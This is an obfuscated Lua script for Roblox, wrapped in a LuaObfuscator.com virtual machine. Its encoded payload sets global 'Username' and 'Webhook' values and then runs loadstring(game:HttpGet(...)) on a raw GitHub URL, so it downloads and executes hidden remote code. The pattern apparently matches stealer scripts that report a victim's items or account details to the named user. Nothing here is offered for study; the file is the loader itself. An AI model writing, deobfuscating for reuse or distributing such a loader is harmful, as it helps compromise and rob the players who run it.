--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=0;local v89;while true do if (v88==0) then v89=v2(v0(v30,16));if v19 then local v117=0;local v118;while true do if (v117==1) then return v118;end if (v117==0) then v118=v5(v89,v19);v19=nil;v117=1;end end else return v89;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v90=0 -0 ;local v91;while true do if (v90==((877 -(282 + 595)) -0)) then v91=(v31/(2^(v32-(1 -0))))%((4 -2)^(((v33-1) -(v32-((558 + 62) -(555 + 64)))) + (932 -(857 + 74)))) ;return v91-(v91%1) ;end end else local v92=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v92 + v92))>=v92) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + (1273 -(226 + 1044)) );v18=v18 + ((4 + 13) -13) ;return (v40 * 16777216) + (v39 * (65653 -(32 + 85))) + (v38 * (251 + 5)) + v37 ;end local function v24() local v41=v23();local v42=v23();local v43=1;local v44=(v20(v42,958 -(892 + 65) ,47 -27 ) * ((3 -1)^(58 -26))) + v41 ;local v45=v20(v42,21,381 -(87 + 263) );local v46=((v20(v42,212 -((1254 -(1069 + 118)) + 113) )==(1 + 0)) and  -((4 -2) -(1 -0))) or (1 + 0) ;if (v45==0) then if (v44==(0 + 0)) then return v46 * (0 -0) ;else v45=953 -(802 + 150) ;v43=0 -0 ;end elseif (v45==(3712 -(2958 -1293))) then return ((v44==(0 + 0 + 0)) and (v46 * ((792 -(368 + 423))/((3133 -2136) -(915 + (100 -(10 + 8))))))) or (v46 * NaN) ;end return v8(v46,v45-(2896 -1873) ) * (v43 + (v44/((2 + 0)^(68 -16)))) ;end local function v25(v47) local v48;if  not v47 then local v93=0 -0 ;while true do if (v93==0) then v47=v23();if (v47==(442 -(416 + (45 -19)))) then return "";end break;end end end v48=v3(v16,v18,(v18 + v47) -(3 -2) );v18=v18 + v47 ;local v49={};for v65=1 + 0 , #v48 do v49[v65]=v2(v1(v3(v48,v65,v65)));end return v6(v49);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v50=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101,v102) local v103=(function() return 0 -0 ;end)();local v94=(function() return;end)();local v95=(function() return;end)();while true do if (v103~=0) then else local v116=(function() return 0;end)();while true do if (v116~=(676 -(534 + 141))) then else v103=(function() return 1 + 0 ;end)();break;end if (v116==0) then v94=(function() return 0;end)();v95=(function() return nil;end)();v116=(function() return 1;end)();end end end if (v103~=1) then else while true do if (v94==0) then v95=(function() return v96();end)();if (v97(v95, #"!", #"!")==(0 + 0)) then local v164=(function() return 0 + 0 ;end)();local v165=(function() return;end)();local v166=(function() return;end)();local v167=(function() return;end)();local v168=(function() return;end)();while true do if (v164~=(0 -0)) then else local v179=(function() return 0 -0 ;end)();while true do if (v179~=1) then else v164=(function() return 2 -1 ;end)();break;end if (v179==(0 + 0)) then v165=(function() return 0 + 0 ;end)();v166=(function() return nil;end)();v179=(function() return 1;end)();end end end if (v164==(397 -(115 + 281))) then local v180=(function() return 0 -0 ;end)();local v181=(function() return;end)();while true do if (v180==(0 + 0)) then v181=(function() return 0 -0 ;end)();while true do if ((3 -2)~=v181) then else v164=(function() return 869 -(550 + 317) ;end)();break;end if (v181==(0 -0)) then local v190=(function() return 0;end)();while true do if (v190==(0 -0)) then v167=(function() return nil;end)();v168=(function() return nil;end)();v190=(function() return 1;end)();end if (v190==(2 -1)) then v181=(function() return 1;end)();break;end end end end break;end end end if (2==v164) then while true do if (v165~= #"~") then else local v183=(function() return 285 -(134 + 151) ;end)();local v184=(function() return;end)();while true do if (v183~=(1665 -(970 + 695))) then else v184=(function() return 0 -0 ;end)();while true do if (v184==1) then v165=(function() return 2;end)();break;end if (v184~=0) then else v168=(function() return {v98(),v98(),nil,nil};end)();if (v166==(0 -0)) then local v191=(function() return 0;end)();while true do if (v191==(0 -0)) then v168[ #"gha"]=(function() return v98();end)();v168[ #"asd1"]=(function() return v98();end)();break;end end elseif (v166== #"[") then v168[ #"xnx"]=(function() return v99();end)();elseif (v166==2) then v168[ #"91("]=(function() return v99() -((7 -5)^(1840 -(1195 + 629))) ;end)();elseif (v166== #"xxx") then local v198=(function() return 0 -0 ;end)();local v199=(function() return;end)();while true do if (v198~=(241 -(187 + 54))) then else v199=(function() return 0;end)();while true do if (v199==(780 -(162 + 618))) then v168[ #"gha"]=(function() return v99() -(2^(12 + 4)) ;end)();v168[ #".com"]=(function() return v98();end)();break;end end break;end end end v184=(function() return 1 + 0 ;end)();end end break;end end end if (v165== #"xxx") then if (v97(v167, #"asd", #"asd")~= #">") then else v168[ #"http"]=(function() return v100[v168[ #"asd1"]];end)();end v101[v102]=(function() return v168;end)();break;end if (v165==2) then local v186=(function() return 0 -0 ;end)();local v187=(function() return;end)();while true do if (v186~=0) then else v187=(function() return 0 -0 ;end)();while true do if ((1 + 0)==v187) then v165=(function() return  #"xnx";end)();break;end if (v187==(1636 -(1373 + 263))) then if (v97(v167, #"}", #">")~= #"]") then else v168[2]=(function() return v100[v168[1002 -(451 + 549) ]];end)();end if (v97(v167,2,1 + 1 )== #"\\") then v168[ #"xxx"]=(function() return v100[v168[ #"91("]];end)();end v187=(function() return 1;end)();end end break;end end end if (v165==0) then local v188=(function() return 0 -0 ;end)();while true do if (v188==0) then v166=(function() return v97(v95,2, #"asd");end)();v167=(function() return v97(v95, #"0313",9 -3 );end)();v188=(function() return 1385 -(746 + 638) ;end)();end if (v188==1) then v165=(function() return  #"{";end)();break;end end end end break;end end end break;end end return v94,v95,v96,v97,v98,v99,v100,v101,v102;end end end;end)();local v51=(function() return function(v104,v105,v106) local v107=(function() return 0;end)();local v108=(function() return;end)();while true do if (0~=v107) then else v108=(function() return 0 + 0 ;end)();while true do if (0==v108) then local v121=(function() return 0;end)();while true do if (v121==(0 -0)) then local v174=(function() return 0;end)();while true do if (v174==0) then v104[v105-#"\\" ]=(function() return v106();end)();return v104,v105,v106;end end end end end end break;end end end;end)();local v52=(function() return {};end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {v52,v53,nil,v54};end)();local v56=(function() return v23();end)();local v57=(function() return {};end)();for v67= #",",v56 do local v68=(function() return 0;end)();local v69=(function() return;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if ((341 -(218 + 123))==v68) then v69=(function() return 1581 -(1535 + 46) ;end)();v70=(function() return nil;end)();v68=(function() return 1;end)();end if (v68~=1) then else v71=(function() return nil;end)();while true do if (v69~=1) then else if (v70== #"|") then v71=(function() return v21()~=0 ;end)();elseif (v70==2) then v71=(function() return v24();end)();elseif (v70== #"91(") then v71=(function() return v25();end)();end v57[v67]=(function() return v71;end)();break;end if (0~=v69) then else local v120=(function() return 0 + 0 ;end)();while true do if (v120==(1 + 0)) then v69=(function() return 1;end)();break;end if (v120~=0) then else v70=(function() return v21();end)();v71=(function() return nil;end)();v120=(function() return 1;end)();end end end end break;end end end v55[ #"gha"]=(function() return v21();end)();for v72= #"[",v23() do FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v57,v52,v72=(function() return v50(FlatIdent_475BC,Descriptor,v21,v20,v22,v23,v57,v52,v72);end)();end for v73= #"\\",v23() do v53,v73,v28=(function() return v51(v53,v73,v28);end)();end return v55;end local function v29(v59,v60,v61) local v62=v59[561 -(306 + (574 -(53 + 267))) ];local v63=v59[1 + 1 + 0 ];local v64=v59[3];return function(...) local v74=v62;local v75=v63;local v76=v64;local v77=v27;local v78=1;local v79= -(1 -0);local v80={};local v81={...};local v82=v12("#",...) -(1 + 0) ;local v83={};local v84={};for v109=(413 -(15 + 398)) -0 ,v82 do if ((1853<4813) and (v109>=v76)) then v80[v109-v76 ]=v81[v109 + 1 ];else v84[v109]=v81[v109 + (604 -(268 + 335)) ];end end local v85=(v82-v76) + (291 -((1042 -(18 + 964)) + 230)) ;local v86;local v87;while true do v86=v74[v78];v87=v86[1];if (v87<=(576 -(426 + 146))) then if (v87<=1) then if ((v87==(0 + 0)) or (2874<2181)) then v84[v86[1458 -(282 + 1174) ]]=v86[814 -(569 + 242) ];else local v124=v86[2];local v125=v84[v86[(30 -22) -5 ]];v84[v124 + 1 ]=v125;v84[v124]=v125[v86[1 + 3 ]];end elseif ((v87<=2) or (2689<=343)) then local v129;local v130,v131;local v132;local v133;v84[v86[2]]=v86[1027 -(706 + 318) ];v78=v78 + 1 + 0 ;v86=v74[v78];v61[v86[1254 -(455 + 266 + 530) ]]=v84[v86[(2123 -(20 + 830)) -(945 + 326) ]];v78=v78 + (2 -1) ;v86=v74[v78];v84[v86[2]]=v86[3 + 0 ];v78=v78 + 1 ;v86=v74[v78];v61[v86[703 -(271 + 335 + 94) ]]=v84[v86[2 + 0 ]];v78=v78 + (1501 -(1408 + 92)) ;v86=v74[v78];v84[v86[1088 -(461 + (751 -(116 + 10))) ]]=v61[v86[1291 -(993 + 295) ]];v78=v78 + 1 + 0 + 0 ;v86=v74[v78];v84[v86[1173 -(418 + 753) ]]=v61[v86[3]];v78=v78 + 1 + 0 ;v86=v74[v78];v133=v86[1 + 1 ];v132=v84[v86[1 + 2 ]];v84[v133 + 1 + 0 ]=v132;v84[v133]=v132[v86[533 -(406 + (861 -(542 + 196))) ]];v78=v78 + (1770 -(1749 + 20)) ;v86=v74[v78];v84[v86[1 + 1 ]]=v86[1325 -(1249 + 73) ];v78=v78 + 1 + 0 ;v86=v74[v78];v84[v86[1147 -((998 -532) + 679) ]]=v86[6 -3 ]~=(0 -0) ;v78=v78 + (1901 -(106 + 1794)) ;v86=v74[v78];v133=v86[1 + 1 ];v130,v131=v77(v84[v133](v13(v84,v133 + 1 + 0 ,v86[8 -(2 + 3) ])));v79=(v131 + v133) -(2 -(1 + 0)) ;v129=0;for v160=v133,v79 do local v161=0;while true do if ((v161==0) or (1869==2009)) then v129=v129 + (115 -(4 + 40 + 70)) ;v84[v160]=v130[v129];break;end end end elseif (v87==(7 -4)) then v61[v86[587 -(57 + 527) ]]=v84[v86[2]];else v84[v86[1429 -(41 + 1386) ]]=v86[106 -(17 + 86) ]~=(0 + 0) ;end elseif (v87<=((33 -20) -7)) then if (v87>5) then local v154=v86[5 -3 ];local v155,v156=v77(v84[v154](v13(v84,v154 + (167 -((1673 -(1126 + 425)) + 44)) ,v86[3])));v79=(v156 + v154) -(1 -0) ;local v157=0 -0 ;for v162=v154,v79 do local v163=0;while true do if (v163==(0 + 0)) then v157=v157 + 1 + 0 ;v84[v162]=v155[v157];break;end end end else v84[v86[3 -1 ]]();end elseif (v87<=(72 -(30 + (440 -(118 + 287))))) then local v158=v86[(7 -5) + 0 ];v84[v158]=v84[v158](v13(v84,v158 + (1258 -(1043 + 214)) ,v79));elseif ((v87>(30 -22)) or (2821<2431)) then v84[v86[(2335 -(118 + 1003)) -(323 + (2601 -1712)) ]]=v61[v86[7 -4 ]];else do return;end end v78=v78 + (581 -(361 + 219)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083Q0003083Q00557365726E616D65030D3Q005468655265616C43796E69785A03073Q00576562682Q6F6B03243Q0033633938643031302D306164332D346366312D383332652D633236616536616634383661030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403433Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F617374726F687562312F6E65772F726566732F68656164732F6D61696E2F6E6577000D3Q0012023Q00023Q00124Q00013Q00124Q00043Q00124Q00033Q00124Q00053Q00122Q000100063Q00202Q00010001000700122Q000300086Q000400016Q000100044Q00075Q00022Q00053Q000100012Q00083Q00017Q00",v9(),...);
